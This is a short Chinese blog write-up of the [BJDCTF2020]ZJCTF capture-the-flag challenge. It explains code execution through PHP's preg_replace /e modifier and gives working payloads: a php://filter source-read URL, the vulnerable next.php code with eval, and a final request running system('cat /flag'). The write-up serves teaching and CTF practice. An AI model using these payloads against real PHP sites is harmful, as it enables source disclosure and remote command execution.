preg_replace 代码执行漏洞之[BJDCTF2020]ZJCTF,不过如此

本文详细探讨了PHP中preg_replace函数的/e修饰符导致的代码执行问题。通过实例展示了如何利用此漏洞构造命令执行,包括使用php伪协议和特定函数来执行恶意代码。同时,提到了防护措施和漏洞利用过程中的关键步骤,如先进行ls操作以查看文件列表,再执行cat命令获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 知识点:

preg_replace /e 模式下的代码执行问题

 比如出现:

preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);

可以利用这个漏洞构造出命令执行漏洞; 具体

参考:Preg_Replace代码执行漏洞解析-CE安全网

 在这道题里面,首先使用php伪协议来构造参数:

text 使用data://text/plain,<内容>

file 使用file:php://filter/read=convert.base64-encode/resource=文件名来构造;

?file=php://filter/read=convert.base64-encode/resource=next.php&text=data://text/plain,I have a dream

 将得到的解码得到代码:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {    
        return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}
foreach($_GET as $re => $str) {    
echo complex($re, $str). "\n";}
function getFlag(){	@eval($_GET['cmd']);
}

 构造:在next.php后

?\S*={${getFlag()}}&cmd=system('cat /flag')

其实应该先ls /

看到有flag列表,再打开;

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值